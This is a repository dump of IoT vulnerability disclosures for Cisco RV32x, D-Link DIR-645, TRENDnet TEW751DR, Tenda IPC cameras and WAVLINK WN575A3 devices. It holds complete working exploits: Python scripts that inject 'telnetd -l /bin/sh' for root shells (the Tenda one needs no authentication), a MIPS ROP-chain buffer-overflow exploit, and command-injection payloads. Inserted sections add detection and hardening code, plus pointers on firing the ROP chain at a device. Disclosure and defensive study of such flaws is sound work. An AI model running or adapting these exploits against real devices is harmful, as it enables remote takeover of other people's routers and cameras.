```
├── Cisco
│   └── Cisco RV32X
│       ├── README.md
│       └── img
│           ├── 1.png
│           ├── 2.png
│           ├── 3.png
│           └── 4.png
├── D-Link
│   └── DIR-645
│       ├── img
│       │   ├── 1.png
│       │   ├── 2.png
│       │   ├── 3.png
│       │   ├── 4.png
│       │   └── 5.png
│       └── readme.md
├── README.md
├── TRENDnet
│   └── TEW751
│       ├── bufferoverflow.md
│       └── img
│           ├── 1.png
│           ├── 2.png
│           ├── 3.png
│           └── shell.png
├── Tenda
│   └── IPC
│       ├── README.md
│       └── img
│           ├── 1.png
│           ├── 2.png
│           ├── 3.png
│           ├── 4.png
│           ├── 5.png
│           ├── 6.png
│           └── 7.png
└── WAVLINK
    └── WN575A3
        ├── Readme.md
        └── img
            ├── 1.png
            ├── 2.png
            ├── 3.png
            ├── 4.png
            ├── 5.png
            ├── 6.png
            └── 7.png
```

--------------------------------------------------------------------------------
/Cisco/Cisco RV32X/README.md:
--------------------------------------------------------------------------------
CVE-id: CVE-2023-20124

Vendor's disclosure and acknowledgement: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv01x_rv32x_rce-nzAGWWDD

# Information

**Vendor of the products:** Cisco

**Vendor's website:** https://www.cisco.com

**Reported by:** FeiXincheng([FXC030618@outlook.com](mailto:FXC030618@outlook.com)) && ShaLetian([ltsha@njupt.edu.cn](mailto:ltsha@njupt.edu.cn))

**Affected products:**

Cisco RV320 Dual Gigabit WAN VPN Router

Cisco RV325 Dual Gigabit WAN VPN Router

**Affected firmware version:**

1.5.1.13 (the latest release version at the time of reporting)

**Firmware download address:**

https://software.cisco.com/download/home/284005936/type/282465789/release/1.5.1.13

# Overview

A command injection vulnerability was found in the web-based management interface of the **Cisco RV32x Series VPN Routers**. It is caused by insufficient validation of user input. An authenticated attacker can send crafted requests to the management interface and, on success, execute arbitrary commands as root on the device.

# Vulnerability details

The vulnerability is in the `ssi.cgi` binary.
In the **NK_UiSetPassword** function, some checks must first be passed by supplying the correct current password and setting the **submitStatus** value.

![1](./img/1.png)

After that, the buffer **local_2c0** is under our control.

![2](./img/2.png)

Finally, **local_2c0** is passed to **system**. It is checked before the call, but the check does not treat **\n** as a separator, whereas `/bin/sh`, which `system` invokes, does: everything after the newline runs as a separate command. The result is a **command injection**.

![3](./img/3.png)

In summary, this is an authenticated remote command execution vulnerability. The attacker places arbitrary commands after a **\n** in the **nUser** field of the POST request and they are executed.

# Poc

Send the following POST request. The `mlap` cookie must be a valid session cookie and the old-password fields must correspond to the current password, otherwise the checks before **system** are not reached.

```
POST /password.htm HTTP/1.1
Host: 192.168.1.1
Cookie: mlap=4zcoqrxD+KTbtDfDTuIWCA==
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 411
Origin: https://192.168.1.1
Referer: https://192.168.1.1/password.htm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

page=password.htm&submitStatus=1&log_ch=1&check_aging_time=0&current_username=cisco&PdAgingTime_open_flag=0&nnUser=cisco&nUser=cis%0Atelnetd%20-p%202222%20-l%20%2Fbin%2Fsh%0A&oPass=123456&md5_old_pass=bbd5a14a86bbdc390e4370ad8525d9eb&md5_new_pass=066bae9070a9a95b3e03019db131cd40&auth_key=1964300002&nPass=cisco&cPass=cisco&PdStrength=&PdAgingDate=0&PDlength=8&PDclass=3&PDdifferent=0&EnableAge=0&idletimeout=10
```

# Attack Demo

After the attack completes, the injected `telnetd -p 2222 -l /bin/sh` gives a remote **root** shell on the device.

![4](./img/4.png)

# exp

```python
import os
import requests
import urllib3

TARGET = "192.168.1.1"
SHELL_PORT = 2222          # port the injected telnetd listens on

# A valid, authenticated session cookie for the web interface.
cookies = {
    'mlap': 's/a8YMD2yjnpaHzgm/mnJg==',
}

headers = {
    'Host': TARGET,
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'https://' + TARGET,
    'Referer': 'https://' + TARGET + '/password.htm',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'iframe',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1',
    'Connection': 'close',
}

# nUser carries the injected command after a URL-encoded newline (%0A); the
# old-password fields must match the current password for the check to pass.
data = ('page=password.htm&submitStatus=1&log_ch=1&check_aging_time=0&current_username=cisco'
        '&PdAgingTime_open_flag=0&nnUser=cisco'
        '&nUser=cisco%0Atelnetd%20-p%20' + str(SHELL_PORT) + '%20-l%20%2Fbin%2Fsh%0A'
        '&oPass=123456&md5_old_pass=bbd5a14a86bbdc390e4370ad8525d9eb'
        '&md5_new_pass=066bae9070a9a95b3e03019db131cd40&auth_key=1964300002'
        '&nPass=cisco&cPass=cisco&PdStrength=&PdAgingDate=0&PDlength=8&PDclass=3'
        '&PDdifferent=0&EnableAge=0&idletimeout=10')


if __name__ == "__main__":
    urllib3.disable_warnings()
    print("[+] Send payload to %s ..." % TARGET)
    try:
        requests.post('https://' + TARGET + '/password.htm', cookies=cookies, headers=headers,
                      data=data, verify=False, timeout=3)
    except requests.exceptions.RequestException:
        pass  # a timeout here is not necessarily a failure; check the telnet port next

    print("[+] Connect to %s %d" % (TARGET, SHELL_PORT))
    os.system("telnet %s %d" % (TARGET, SHELL_PORT))
```
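The following Python is an added example, not part of this advisory or of Cisco's code. It models the root cause described above: a denylist that rejects the usual shell metacharacters but forgets that `/bin/sh` also splits commands on newline, next to an allowlist check that would have blocked the PoC. It also reproduces how the PoC body is built, so that the `%0A` in `nUser` comes out of URL encoding rather than being typed by hand. The characters in `DENYLIST`, the `USERNAME_ALLOWED` pattern and the `somecmd` prefix are illustrative assumptions; the page does not show which characters `ssi.cgi` actually checks or the exact command template it hands to `system`.

```python
import re
from typing import List, Optional
from urllib.parse import quote, urlencode

# Assumed denylist: the characters a typical "no shell metacharacters" check rejects.
# The page only states that the real check in ssi.cgi does not cover "\n".
DENYLIST = set(";|&`$(){}<>")

# A POSIX shell separates commands on newline, ';', '&&', '||', '&' and '|'.
SEPARATORS = re.compile(r"\n|;|&&|\|\||&|\|")

# Assumed allowlist for a username: letters, digits and a little punctuation only.
USERNAME_ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def denylist_check(value: str) -> bool:
    """Model of the weak check: True means the value is accepted."""
    return not any(c in DENYLIST for c in value)


def allowlist_check(value: str) -> bool:
    """Hardened check: True only if every character is explicitly permitted."""
    return USERNAME_ALLOWED.fullmatch(value) is not None


def shell_commands(cmdline: str) -> List[str]:
    """Split a command line the way /bin/sh would, to count what actually runs."""
    return [p.strip() for p in SEPARATORS.split(cmdline) if p.strip()]


def _quote_all(s, safe="", encoding=None, errors=None):
    # Percent-encode everything except unreserved characters, so that a space
    # becomes %20 and '/' becomes %2F, as in the captured PoC request.
    return quote(s, safe="", encoding=encoding, errors=errors)


def build_post_body(new_user: str, injected_cmd: Optional[str] = None, fields=None) -> str:
    """Build the x-www-form-urlencoded body of the password.htm POST.

    With injected_cmd set, nUser becomes "<user>\n<cmd>\n"; urlencode turns the
    newlines into %0A, which is exactly what the vulnerable check lets through.
    Only two of the form fields are modelled here; the PoC above has the full set.
    """
    form = dict(fields or {"page": "password.htm", "submitStatus": "1"})
    form["nUser"] = new_user if injected_cmd is None else "%s\n%s\n" % (new_user, injected_cmd)
    return urlencode(form, quote_via=_quote_all)


if __name__ == "__main__":
    user = "cisco\ntelnetd -p 2222 -l /bin/sh\n"
    print("denylist accepts :", denylist_check(user))    # True: the bypass
    print("allowlist accepts:", allowlist_check(user))   # False
    # Constructed stand-in for whatever command template ssi.cgi wraps around the username.
    print(shell_commands("somecmd " + user))
    print(build_post_body("cisco", "telnetd -p 2222 -l /bin/sh"))
```

The point of `shell_commands` is that the newline, which the denylist never looks at, is enough to turn one command into two. A filter that enumerates bad characters has to know every separator the target shell honours; an allowlist does not.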
--------------------------------------------------------------------------------
/D-Link/DIR-645/readme.md:
--------------------------------------------------------------------------------
Vendor of the products: D-Link

Reported by: WangJincheng(wjcwinmt@outlook.com) && FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

Affected products: D-Link DIR-645 <= v1.03

Vendor Homepage: https://www.dlink.com/en/consumer

Vendor Advisory: https://tsd.dlink.com.tw/ddgo

CVE_ID: [CVE-2022-32092](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32092)


# Summary

`D-Link DIR-645` contains a command injection vulnerability in the handler for `__ajax_explorer.sgi`. It allows attackers to execute arbitrary commands via the `QUERY_STRING` parameter.

# Vulnerability description

`scandir_main` reads `QUERY_STRING` from the environment and passes it to `sub_410AD4`.

![1](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/1.png)

`sub_410AD4` calls `sub_410434`.

![2](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/2.png)

`sub_410434` passes the attacker-controlled query-string content into a shell command without sanitising it; this is the command injection.
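As an added example (not from this advisory or from D-Link), the following Python detects attempts to exploit the injection described above by decoding the query string of requests to `__ajax_explorer.sgi` and flagging any parameter whose value contains a shell metacharacter. It runs over constructed access-log style lines, the kind a reverse proxy or network sensor in front of the router could record; the DIR-645 itself is not assumed to keep such a log, and the log format, timestamps and client address are made up for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Path of the vulnerable CGI and the shell metacharacters that should never
# appear in its parameters.
VULN_PATH = "__ajax_explorer.sgi"
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(")

# Matches the request target in an access-log style line, e.g.
#   ... "GET /portal/__ajax_explorer.sgi?action=umnt&... HTTP/1.1" 200 12
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def query_params(query):
    """Split a raw query string by hand: parse_qsl changed its treatment of
    ';' between Python versions, and ';' is exactly what we need to keep."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def suspicious_params(url):
    """Return (name, decoded value) for every parameter of a request to the
    vulnerable CGI whose decoded value contains a shell metacharacter."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + VULN_PATH):
        return []
    return [(k, v) for k, v in query_params(parts.query) if SHELL_META.search(v)]


def scan_log(lines):
    """Run the check over log lines; returns (line number, param, value) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group(1)):
            hits.append((n, name, value))
    return hits


# Constructed sample log lines (not real traffic): a benign request to the CGI,
# the PoC request from this advisory, and an unrelated request.
SAMPLE_LOG = [
    '192.168.0.50 - - [16/Mar/2022:19:10:01 +0800] "GET /portal/__ajax_explorer.sgi?action=umnt&path=path&where=here&en=0 HTTP/1.1" 200 12',
    '192.168.0.50 - - [16/Mar/2022:19:14:07 +0800] "GET /portal/__ajax_explorer.sgi?action=umnt&path=path&where=here&en=;echo%20X1cT34mpwner%20>FXC; HTTP/1.1" 200 12',
    '192.168.0.50 - - [16/Mar/2022:19:14:09 +0800] "GET /index.php HTTP/1.1" 200 4532',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: parameter %r = %r" % hit)
```

The value is decoded once before matching, so `%3B` is caught as well as a literal `;`. Matching on the raw query string instead would miss encoded forms, and matching after a second decode would produce false positives on legitimately percent-encoded data.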
![3](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/3.png)

Before the attack:

![4](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/4.png)

After the attack:

![5](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/5.png)

# poc

```
curl "http://192.168.0.1/portal/__ajax_explorer.sgi?action=umnt&path=path&where=here&en=;echo%20X1cT34mpwner%20>FXC;"
```

The injected `en` value starts with `;` to terminate whatever command precedes it and ends with `;` to cut off whatever follows; `echo X1cT34mpwner >FXC` in between writes a marker file as proof of execution.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# iot-vul

### CNVD
#### Dlink
CNVD-2022-38324 DOS

CNVD-2022-47126 Command Injection

CNVD-2022-47133 Command Injection

#### TRENDnet

CNVD-2022-38121 RCE

#### H3C

CNVD-2022-48622 DOS

CNVD-2022-48624 DOS

#### Tenda

CNVD-2022-48620 Command Injection

CNVD-2022-50401 DOS

#### TP-Link

CNVD-2022-50083 DOS

CNVD-2022-50402 DOS

#### Totolink

CNVD-2022-50687 Command Injection

CNVD-2022-50688 Command Injection

#### WAVLINK

CNVD-2022-53809 Command Injection

### CVE

#### D-Link
CVE-2022-32092 Command Injection

CVE-2022-30521 Command Injection

#### TRENDnet

CVE-2022-33007 Command Injection

#### WAVLINK

CVE-2022-37149 Command Injection

#### Tenda IPC

CVE-2023-23080 RCE

#### Cisco

CVE-2023-20124 RCE

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv01x_rv32x_rce-nzAGWWDD

--------------------------------------------------------------------------------
/TRENDnet/TEW751/bufferoverflow.md:
--------------------------------------------------------------------------------
Vendor of the products: TRENDnet

Reported by: FeiXincheng && WangJincheng from X1cT34m

Affected products: TRENDnet TEW751DR <= v1.03, TRENDnet TEW-752DRU <= v1.03

Vendor Homepage: https://www.trendnet.com/

Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165_TEW-751DR ,
https://www.trendnet.com/support/support-detail.asp?prod=170_TEW-752DRU

CVE_ID: [CVE-2022-33007](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33007)

# Summary

The LAN-side web configuration interface of the `TRENDnet` `TEW751DR` and `TEW-752DRU` Wi-Fi router firmware has a stack-based buffer overflow. In the `genacgi_main` function of the `cgibin` program, the `service` parameter of `/gena.cgi` is copied with `sprintf` into a fixed-size stack buffer without a length check. An attacker can craft the parameter to overwrite the saved registers and return address and execute arbitrary code.

# Vulnerability description

There is a stack overflow in the `genacgi_main` function.

![1](https://github.com/fxc233/CVE/blob/main/img/1.png)

It calls the `sub_40EC1C` function.

![2](https://github.com/fxc233/CVE/blob/main/img/2.png)

In `sub_40EC1C`, `sprintf` copies `a1` into `v23` without any bounds check, which causes the stack overflow.
![3](https://github.com/fxc233/CVE/blob/main/img/3.png)


# poc

The chain below calls `system("telnetd -p 7777;")` through two libc gadgets. The overwritten saved `$ra` points at a gadget that does `addiu $s0, 1` and jumps to `$s1`; `$s1` points at a gadget that computes `$sp + 0x18`, where the command string sits, and jumps to `$s0`, which by then holds `system`. `$s0` is stored as `system - 1` so that the `addiu` lands exactly on `system`. The libc base is hardcoded, so library addresses are assumed to be fixed on this firmware.

```python
# python3
import os
import socket
import time
from pwn import context, p32

context(os='linux', arch='mips')   # big-endian packing for p32

libc_base = 0x2aaf8000             # libc load address on the target

cmd = b'telnetd -p 7777;'          # trailing ';' separates the command from whatever follows it in memory
payload = b'a' * 462
payload += p32(libc_base + 0x53200 - 1)  # saved $s0: system - 1 (the $ra gadget adds 1 before it is called)
payload += p32(libc_base + 0x169C4)      # saved $s1: addiu $s2, $sp, 0x18 ; ... ; jalr $s0
payload += b'a' * 4                      # saved $s2: don't care
payload += p32(libc_base + 0x32A98)      # saved $ra: addiu $s0, 1 ; ... ; jalr $s1
payload += b'a' * 0x18                   # padding up to $sp + 0x18
payload += cmd                           # argument for system()

msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.10.1", 49152))
s.sendall(msg)
s.close()

time.sleep(1)
os.system("telnet 192.168.10.1 7777")
```


![shell](https://github.com/fxc233/CVE/blob/main/img/shell.png?raw=true)
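The following Python is an added example, not code from this advisory or from TRENDnet. It rebuilds the PoC payload with `struct` instead of pwntools, reads the four saved-register slots back out of it, and walks the chain using only the register effects the PoC comments describe, to confirm that execution ends at `system` with `$sp + 0x18` pointing at the command. The offsets and libc base are the PoC's; the model that `$sp` sits directly behind the saved `$ra` after the epilogue, and the NUL-byte check, are assumptions about how `sprintf` and a standard MIPS epilogue behave rather than facts taken from the page.

```python
import struct

# Values taken from the PoC; the offsets are specific to the libc in this firmware.
LIBC_BASE = 0x2AAF8000
SYSTEM_OFF = 0x53200        # system()
GADGET_A_OFF = 0x169C4      # addiu $s2, $sp, 0x18 ; ... ; jalr $s0
GADGET_B_OFF = 0x32A98      # addiu $s0, 1         ; ... ; jalr $s1
PAD_LEN = 462               # bytes from the start of the buffer to the saved $s0 slot
ARG_OFF = 0x18              # distance from the post-epilogue $sp to the command string


def p32(value):
    """Pack a 32-bit word big-endian, the byte order of this MIPS target
    (pwntools does the same once context.arch is 'mips')."""
    return struct.pack(">I", value & 0xFFFFFFFF)


def build_chain(cmd, libc_base=LIBC_BASE):
    """Rebuild the PoC payload. cmd should end with ';' so that whatever
    follows it in memory is parsed by the shell as a separate command."""
    words = (libc_base + SYSTEM_OFF - 1, libc_base + GADGET_A_OFF, libc_base + GADGET_B_OFF)
    for w in words:
        if b"\x00" in p32(w):
            raise ValueError("address %#x contains a NUL byte; sprintf would stop there" % w)
    if b"\x00" in cmd:
        raise ValueError("the command cannot contain a NUL byte")
    chain = b"a" * PAD_LEN
    chain += p32(libc_base + SYSTEM_OFF - 1)   # saved $s0: system - 1
    chain += p32(libc_base + GADGET_A_OFF)     # saved $s1
    chain += b"a" * 4                          # saved $s2: overwritten by gadget A
    chain += p32(libc_base + GADGET_B_OFF)     # saved $ra: first gadget to run
    chain += b"a" * ARG_OFF                    # padding up to $sp + 0x18
    chain += cmd
    return chain


def saved_registers(chain):
    """Read back the four saved-register slots that the epilogue will load."""
    s0, s1, s2, ra = struct.unpack(">IIII", chain[PAD_LEN:PAD_LEN + 16])
    return {"s0": s0, "s1": s1, "s2": s2, "ra": ra}


def simulate(chain, libc_base=LIBC_BASE):
    """Walk the chain with only the register effects the PoC comments describe.
    Stack addresses are modelled as offsets into the chain: after the epilogue
    pops the four slots, $sp sits right behind the saved $ra (assumption).
    Returns (final pc, bytes at $sp + 0x18) or (None, b"") if a jump is off."""
    regs = saved_registers(chain)
    sp = PAD_LEN + 16
    pc = regs["ra"]                      # jr $ra -> gadget B
    if pc != libc_base + GADGET_B_OFF:
        return None, b""
    s0 = (regs["s0"] + 1) & 0xFFFFFFFF   # addiu $s0, 1
    pc = regs["s1"]                      # jalr $s1 -> gadget A
    if pc != libc_base + GADGET_A_OFF:
        return None, b""
    s2 = sp + ARG_OFF                    # addiu $s2, $sp, 0x18
    pc = s0                              # jalr $s0 -> system
    return pc, chain[s2:]


def chain_is_consistent(cmd, libc_base=LIBC_BASE):
    """True if the chain reaches system() with the command at $sp + 0x18."""
    pc, arg = simulate(build_chain(cmd, libc_base), libc_base)
    return pc == libc_base + SYSTEM_OFF and arg == cmd


if __name__ == "__main__":
    cmd = b"telnetd -p 7777;"
    chain = build_chain(cmd)
    print({k: hex(v) for k, v in saved_registers(chain).items()})
    print("chain consistent:", chain_is_consistent(cmd))
```

Two things worth checking before firing a chain like this at a device: that every address survives `sprintf` (no NUL bytes, which the builder checks), and that `libc_base` really is constant across reboots on the target, which a fixed value in the PoC implies but which should be confirmed from `/proc/<pid>/maps` on the device.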
--------------------------------------------------------------------------------
/Tenda/IPC/README.md:
--------------------------------------------------------------------------------
# Information

#### CVE ID: CVE-2023-23080

#### Vendor of the products:

Tenda

#### Reported by:

FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

#### Affected products:

Tenda CP7, Tenda CP3 v.10, Tenda IT7-PCS, Tenda IT7-LCS, Tenda IT7-PRS, Tenda IT7-LRS, Tenda IC7-LRS, Tenda IC7-PRS, Tenda IT6-PCS, Tenda IT6-LCS, Tenda IT6-PRS, Tenda IC6-LRS, Tenda IC6-PRS, Tenda IT6-LRS

#### Affected firmware version:

Tenda CP7 <= V11.10.00.2211041403

Tenda CP3 v.10 <= V20220906024_2025

Tenda IT7-PCS <= V2209020914

Tenda IT7-LCS <= V2209020914

Tenda IT7-PRS <= V2209020908

Tenda IT7-LRS <= V2209020908_0909

Tenda IC7-LRS <= 2209020910

Tenda IC7-PRS <= 2209020910

Tenda IT6-PCS <= 2209020915

Tenda IT6-LCS <= 2209020915

Tenda IT6-PRS <= 2209020911

Tenda IC6-LRS <= 2209020912

Tenda IC6-PRS <= 2209020912

Tenda IT6-LRS <= 2209020911

#### Vendor Homepage:

https://www.tenda.com.cn/

#### Vendor Advisory:

https://www.tenda.com.cn/product/download/CP7.html

https://www.tenda.com.cn/download/detail-3472.html

https://www.tenda.com.cn/download/detail-3471.html

https://www.tenda.com.cn/download/detail-3470.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3467.html

https://www.tenda.com.cn/download/detail-3463.html

https://www.tenda.com.cn/download/detail-3478.html

https://www.tenda.com.cn/download/detail-3469.html

https://www.tenda.com.cn/download/detail-3464.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3461.html

https://www.tenda.com.cn/download/detail-3462.html

https://www.tenda.com.cn/download/detail-3465.html

# Summary

The `Tenda IPC` firmware contains a command injection vulnerability in the service listening on TCP port `1300`. Data received on that port reaches `popen` unchanged, so an attacker who can reach the port can execute arbitrary commands without authentication.

# Vulnerability details

The vulnerable service listens on port `1300`.

Execution begins at the `start` entry point, which calls the `sub_11924` function.

![1](./img/1.png)

In `sub_11924`, the data read from the socket is attacker-controlled, and it is handed to the `sub_14404` function.

![2](./img/2.png)

In `sub_14404`, the content is passed on to `sub_16E04`.

![3](./img/3.png)

In `sub_16E04`, the content reaches the dangerous function `popen`, which gives command execution.
![4](./img/4.png)



# poc

Usage, for example: `python3 exploit.py 192.168.2.106 8888`

```python
from time import sleep
import socket
import sys
import os


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: python3 exploit.py <target ip> <shell port>")
        sys.exit(1)
    TARGET_IP = sys.argv[1]
    SHELL_PORT = sys.argv[2]

    # The service on port 1300 hands the received data to popen, so a plain
    # shell command line is the whole payload; '&' leaves telnetd running.
    SHELL_OPERATION = "telnetd -p %s -l /bin/sh &" % SHELL_PORT

    print("\x1b[01;38;5;214m[+] Connect to target ip\x1b[0m")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    s.connect((TARGET_IP, 1300))
    sleep(0.5)

    print("[+] Sending payload to %s ..." % TARGET_IP)
    s.sendall(SHELL_OPERATION.encode())

    try:
        s.recv(1024)          # the service may not answer; do not hang on it
    except socket.timeout:
        pass
    sleep(1)
    s.close()

    print("\x1b[01;38;5;1m[+] Connecting to port %s\x1b[0m" % SHELL_PORT)
    os.system("telnet %s %s" % (TARGET_IP, SHELL_PORT))
```

#### Before attack

![5](./img/5.png)

#### After attack

![6](./img/6.png)

![7](./img/7.png)
--------------------------------------------------------------------------------
/WAVLINK/WN575A3/Readme.md:
--------------------------------------------------------------------------------
# Information

Vendor of the products: WAVLINK

Reported by: FeiXincheng(FXC030618@outlook.com) && WangJincheng(wjcwinmt@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

Affected products: WAVLINK WL-WN575A3

Affected firmware version: RPT75A3.V4300.201217

Vendor Homepage: https://www.wavlink.com/en_us

Vendor Advisory: https://www.wavlink.com/en_us/firmware/details/fac744bd61.html

CVE_ID: CVE-2022-37149

# Summary

`WAVLINK WL-WN575A3` contains a command injection vulnerability in `adm.cgi`. It allows attackers to execute arbitrary commands via the `username` parameter.

# Show the product

`Wavlink WL-WN575A3` is an AC1200 dual-band Wi-Fi range extender. The version tested here is `RPT75A3.V4300.201217`.

![1](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/1.png)

# Vulnerability details

The vulnerability is in `/etc_ro/lighttpd/www/cgi-bin/adm.cgi`.

Execution begins at the `_start` entry point, which calls the `ftext` function.

![2](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/2.png)

In `ftext`, the `page` field of the request is attacker-controlled; when it is `sysinit`, the `set_sys_init` function is executed.

![3](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/3.png)

In `set_sys_init`, the program uses `web_get` to obtain the `username` and `newpass` parameters sent in the `POST` request. When `newpass != 0`, `username` is formatted into a string that is passed to `do_system`, which executes it as a system command. Because `username` is not sanitised, shell metacharacters in it, such as backticks, are interpreted.

![4](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/4.png)

![5](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/5.png)



# poc

Send the following body to `http://wifi.wavlink.com/cgi-bin/adm.cgi` in a `POST` request.
```
page=sysinit&username=fxc`ls>/etc_ro/lighttpd/www/fxc.html`
```

The backticks run `ls` as a command substitution inside the command built from `username`, and the redirect writes the listing into the web root, where it can be fetched as `fxc.html` to confirm execution.

#### Before attack

![6](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/6.png)

#### After attack

![7](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/7.png)
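The WAVLINK `set_sys_init` bug (`username` formatted into a string for `do_system`) and the Tenda IPC bug earlier in this repository (a line received on port 1300 handed straight to `popen`) share one root cause: attacker text is concatenated into a command line that a shell then interprets. The following Python is an added example, not code from either vendor or from this advisory. It contrasts that pattern with the fixes a developer should reach for: running the program with an argv list and no shell, so that backticks stay literal; quoting when a shell cannot be avoided; and validating the value against an allowlist before use. `echo` stands in for the real command, whose template the page does not show, the username pattern and the `COMMANDS` table are assumptions, and the probe string is a harmless stand-in for the PoC's `ls>...` payload.

```python
import re
import shlex
import subprocess

# Assumed allowlist for a username; the affected firmware applies no check at all.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Tenda-style fix: a fixed table of command name -> argv, instead of popen(received line).
# The table is illustrative; the real service's command set is not shown on the page.
COMMANDS = {"version": ["echo", "fw-version-stub"]}


def run_vulnerable(username):
    """Model of do_system(sprintf("... %s ...", username)): the string goes to
    /bin/sh, so backticks and other metacharacters are interpreted."""
    cmdline = "echo " + username            # 'echo' stands in for the real command
    out = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def run_no_shell(username):
    """Same command with an argv list and no shell: the username is a single
    argument and the backticks reach echo as plain characters."""
    out = subprocess.run(["echo", username], capture_output=True, text=True)
    return out.stdout.strip()


def run_quoted(username):
    """If a shell really is unavoidable, shlex.quote makes the value one word."""
    out = subprocess.run("echo " + shlex.quote(username), shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None


def run_hardened(username):
    """Allowlist first, then no shell. Rejecting early keeps bad input out of
    logs, config files and any later code path that may still use a shell."""
    if not is_valid_username(username):
        raise ValueError("username contains characters outside the allowlist")
    return run_no_shell(username)


def is_known_command(line):
    """A received line is acceptable only if it is exactly one known command word."""
    words = line.split()
    return len(words) == 1 and words[0] in COMMANDS


def handle_line(line):
    """Dispatcher for a Tenda-style service: look the word up, run a fixed argv."""
    if not is_known_command(line):
        raise ValueError("unknown command")
    out = subprocess.run(COMMANDS[line.strip()], capture_output=True, text=True)
    return out.stdout.strip()


if __name__ == "__main__":
    probe = "fxc`echo INJECTED`"                   # benign stand-in for the PoC payload
    print("shell     :", run_vulnerable(probe))    # fxcINJECTED: the substitution ran
    print("argv      :", run_no_shell(probe))      # backticks printed literally
    print("quoted    :", run_quoted(probe))        # backticks printed literally
    print("allowed   :", is_valid_username(probe)) # False
    print("dispatch  :", handle_line("version"))
    print("dispatch? :", is_known_command("telnetd -p 8888 -l /bin/sh &"))  # False
```

Note the order in `run_hardened`: the allowlist runs before anything is executed. Quoting alone (`run_quoted`) stops the shell from interpreting the value but still lets arbitrary bytes reach the program and whatever it writes to; a narrow allowlist is what removes that class of input from the system entirely.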